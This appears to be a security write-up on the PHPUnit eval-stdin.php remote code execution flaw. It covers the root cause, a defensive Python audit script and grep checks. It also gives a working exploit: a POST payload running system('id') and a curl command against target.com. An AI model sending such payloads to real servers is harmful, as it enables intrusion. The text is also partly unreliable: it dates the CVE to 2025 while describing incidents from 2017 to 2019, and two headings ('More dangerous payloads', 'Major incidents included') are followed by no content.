vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php CVE (2025)

Search your codebase for unsafe patterns:

grep -r "php://input" vendor/phpunit/
grep -r "eval-stdin" vendor/

Certain versions of PHPUnit contain a vulnerability that allows an attacker to execute arbitrary code on the server. The root cause is input that is not properly sanitized before it reaches a mechanism like eval(), so the attacker-controlled input is run as PHP code.

Within PHPUnit, eval-stdin.php is a small utility script used for testing purposes. If it is not properly secured, it becomes an attack vector, because the input it receives is fed directly into eval() without any validation or sanitization.

Ironically, eval-stdin.php was not designed as a backdoor. It was a utility script for PHPUnit’s own internal process isolation. When running tests that call exec() or external processes, PHPUnit used this script to evaluate small snippets of PHP code passed via standard input. The developer intended to use it exclusively from the command line.

The critical oversight: No authentication, no IP whitelisting, no php_sapi_name() check to ensure it runs via CLI. When exposed to a web server, it transforms into an unrestricted RCE gadget.

An attacker sends an HTTP request to:

http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

with a raw POST body containing PHP code. For example:

Payload (URL-encoded or raw):

<?php system('id'); ?>

cURL example:

curl -X POST http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php \
  -d "<?php system('id'); ?>"

If the script is accessible and the vendor directory is not protected, the server will execute id and return the output.
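The two conditions described above (eval() of php://input with no php_sapi_name() or PHP_SAPI guard, and a vendor directory sitting under the web root) can be turned into a small audit. The script below is an added example, not PHPUnit's code or anything from this page; the sample file bodies are constructed, and acme/fork is a hypothetical package path used only to show that forks and copies are found too.

```python
import re
import tempfile
from pathlib import Path

# Path of the PHPUnit utility script inside a Composer vendor directory (from the page).
EVAL_STDIN_REL = Path("phpunit/phpunit/src/Util/PHP/eval-stdin.php")

# Constructed sample bodies: an unguarded eval() of php://input (as described above) and a CLI-guarded php://stdin reader.
VULNERABLE_SRC = "<?php\neval('?>'.file_get_contents('php://input'));\n"
FIXED_SRC = "<?php\nif (PHP_SAPI !== 'cli') { exit(1); }\neval('?>'.file_get_contents('php://stdin'));\n"

def classify_eval_stdin(source: str) -> dict:
    """Flag the page's two conditions: eval() of php://input (the raw HTTP POST body
    under a web SAPI) with no CLI-only guard (php_sapi_name() or PHP_SAPI).
    php://stdin cannot be populated by an HTTP request, so that form is not flagged."""
    uses_eval = re.search(r"\beval\s*\(", source) is not None
    reads_post_body = "php://input" in source
    cli_guard = re.search(r"php_sapi_name\s*\(\s*\)|\bPHP_SAPI\b", source) is not None
    return {"uses_eval": uses_eval, "reads_post_body": reads_post_body, "cli_guard": cli_guard,
            "vulnerable": uses_eval and reads_post_body and not cli_guard}

def _under(path: Path, root: Path) -> bool:
    """True if path lies inside root after resolving symlinks."""
    try:
        path.resolve().relative_to(root.resolve())
        return True
    except ValueError:
        return False

def audit_vendor_tree(vendor_dir: str, docroot: str = None) -> list:
    """Classify every eval-stdin.php under vendor_dir (forks and copies included) and record
    whether it sits under the web document root, i.e. whether a POST could reach it at all."""
    findings = []
    for path in Path(vendor_dir).rglob("eval-stdin.php"):
        info = classify_eval_stdin(path.read_text(encoding="utf-8", errors="replace"))
        info["path"] = str(path)
        info["web_exposed"] = docroot is not None and _under(path, Path(docroot))
        findings.append(info)
    return sorted(findings, key=lambda f: f["path"])

def demo() -> list:
    """Constructed vendor tree in a temp dir: the PHPUnit path holds the vulnerable body,
    a hypothetical acme/fork package holds the guarded one; the temp dir is the docroot."""
    with tempfile.TemporaryDirectory() as root:
        vendor = Path(root) / "vendor"
        for rel, src in ((EVAL_STDIN_REL, VULNERABLE_SRC), (Path("acme/fork/eval-stdin.php"), FIXED_SRC)):
            (vendor / rel).parent.mkdir(parents=True)
            (vendor / rel).write_text(src)
        return audit_vendor_tree(str(vendor), docroot=root)
```

Run audit_vendor_tree() against a real vendor directory with docroot set to the web server's document root; a finding with both vulnerable and web_exposed true is the exact condition the cURL request above relies on.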

More dangerous payloads:

Between 2017 and 2019, this vulnerability was a goldmine for attackers. Major incidents included:

Security scanners like WPScan, Nuclei, and Nessus added dedicated checks for eval-stdin.php due to its prevalence.
